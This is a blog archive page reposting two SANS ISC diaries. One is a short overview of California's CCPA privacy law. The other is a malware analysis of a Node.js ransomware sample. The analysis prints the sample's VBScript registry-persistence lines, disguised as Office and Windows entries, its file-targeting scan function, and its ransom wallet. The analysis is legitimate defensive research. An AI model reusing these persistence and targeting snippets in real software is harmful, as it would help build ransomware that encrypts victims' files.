Blog

Archive for January 2nd, 2020

CCPA – Quick Overview, (Fri, Jan 3rd)

It’s been quiet lately.  Hopefully, it is not a calm before a storm if you will.  I crawled out from under my rock and found that the State of California law that offers new consumer protection went into effect Jan 1, 2020.   So I poked around the Interwebs to learn about what to expect.  For what it’s worth, I am not a resident of California so I am not particularly entitled to these new protections today.  I do think it is a sign of what is coming.   Europe implemented the General Data Protection Regulation a couple of years ago.  There are more states adopting more consumer protections each year.  Let’s hope they have enough teeth to have an impact.  I took some time to read through the law [1] to highlight it for you.  Please note, I am not an attorney or even have interest in being one.  Let’s take a look.

 The CCPA – California Consumer Privacy Act [1] was passed in June 2018 and went into effect January 01, 2020.   Some report that the Attorney General office will begin enforcement on July 01, 2020.   The law itself [1] does not cite any enforcement date.  Some companies have released statements they are adopting this for all customers, not just those in the State of California.   FWIW, I have seen some sites recently, even prior to the first of the year that are now offering conspicuous opt out links.

The CCPA..

      - Grants consumer a right to request…
               - specific pieces of information that it collects.
               - categories of sources from which that information is collected.
               - the business purposes for collecting or selling the information.
               - the categories of 3rd parties with which information is shared.
               - deletion of personal information…upon receipt of a verified request.
               - the business to not sell personal information (opt out)
      - Authorizes businesses to offer financial incentives for collection of personal info. (They must opt in)
      - Prohibits businesses to sell information of a consumer under 16 years of age without an opt in.
      - Businesses are not required to provide information more than twice in a 12 month period.
      - Businesses must provide a clear and conspicuous link on the Internet home page titled "Do Not Sell My Personal Information"…
      - Consumers "opt out" is good for 12 months before the business may request to authorize the sale of information.

If you think there are any other points to highlight that I did not mention, then please comment below to add to the discussion.

-Kevin


ISC Handler on Duty

[1] https://leginfo.legislature.ca.gov/faces/billTextClient.xhtml?bill_id=201720180AB375

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Ransomware in Node.js, (Thu, Jan 2nd)

Happy new year to all! I hope that you enjoyed the switch to 2020! From a security point of view, nothing changed and malicious code never stops trying to abuse our resources even during the holiday season. Here is a sample that I spotted two days ago. It’s an interesting one because it’s a malware that implements ransomware features developed in Node.js[1]! The stage one is not obfuscated and I suspect the script to be a prototype or a test… It has been submitted to VT from Bahrein (SHA256:90acae3f682f01864e49c756bc9d46f153fcc4a7e703fd1723a8aa7ec01b378c) and has currently a score of 12/58[2].

The first stage is a VBScript that decodes the ransomware, setup persistence and deploys a local Node.js instance running the generated files in %USERPROFILE%AppDataLocal:

GFp0JAklLT8PCI.js
GFp0JAknode_modulesgraceful-fsfs.js
GFp0JAknode_modulesgraceful-fspackage.json
GFp0JAknode_modulesgraceful-fsgraceful-fs.js
GFp0JAknode_modulesgraceful-fslegacy-streams.js
GFp0JAknode_modulesgraceful-fspolyfills.js

Node.js is downloaded from hxxps://nodejs[.]org/download/release/latest-v8.x/win-x86/node.exe and saved as %USERPROFILE%AppDataLocalGFp0JAkGFp0JAk.exe

Persistence is added via Registry keys:

oShell.RegWrite "HKCUSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Office", "wscript " & strVbs,"REG_SZ"
oShell.RegWrite "HKCUSoftwareMicrosoftWindowsCurrentVersionRunStartup",  strExe & " " & outWorkingDir & "" & strEntPoint & " decryptStatic","REG_SZ"
oShell.RegWrite "HKCUSoftwareMicrosoftWindowsCurrentVersionRunWindows", "cmd /c start  /min " & outWorkingDir & "How-to-buy-bitcoins.html","REG_SZ"

The script main loop performs the following tasks every 40 seconds:

  1. Checks if node.exe has been successfully downloaded and, if not, it downloads and dumps it to the disk
  2. Dumps the Node.js module and files to disk (see the list above)
  3. Deploys the Node.js code.

Once done, an “initdone” file is created and the desktop layout reset (icons & positions) by deleting the registry key:

HKCUSoftwareMicrosoftWindowsShellBags1Desktop

Now, let’s have a look at the Node.js code, the ransomware itself.

This code is obfuscated but easy to process with a Javascript beautifier. Here is some interesting extracted information:

Ransom price: 0.4 BTC
Bitcoin wallet: 18aBKwKJvMCkZmpkcCbW9b9y9snAmU3kgo[3]

Encryption is performed via a public/private key pair.

Files to encrypt are scanned via this function:

scan = function() {
    var b = [];
    b.push(userprofile + ""
        Desktop "");
    b.push(userprofile + ""
        Documents "");
    b.push(userprofile + ""
        Downloads "");
    b.push(userprofile + ""
        Contacts "");
    b.push(userprofile + ""
        Pictures "");
    b.push(userprofile + ""
        Music "");
    b.push(userprofile + ""
        Videos "");
    b.push(userprofile + ""
        AppData Local Microsoft Outlook "");
    for (var a = 0; 25 > a; a++) {
        var c = String.fromCharCode(66 + a) + "": "",
            d = c + ""
        "" + testFile;
        if (fs.existsSync(c)) try {
            fs.writeFileSync(d, ""
                "", ""
                utf - 8 ""), b.push(c), removeFile(d)
        } catch (e) {}
    }
    return b
};

The ransomware notification is also generated on the fly:

I did not find a contact email address for the victims and the encrypted file extension is empty in the code. If you have more information about this sample, please share it!

[1] https://nodejs.org/en/
[2] https://www.virustotal.com/gui/file/90acae3f682f01864e49c756bc9d46f153fcc4a7e703fd1723a8aa7ec01b378c/detection
[3] https://www.blockchain.com/btc/address/18aBKwKJvMCkZmpkcCbW9b9y9snAmU3kgo

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →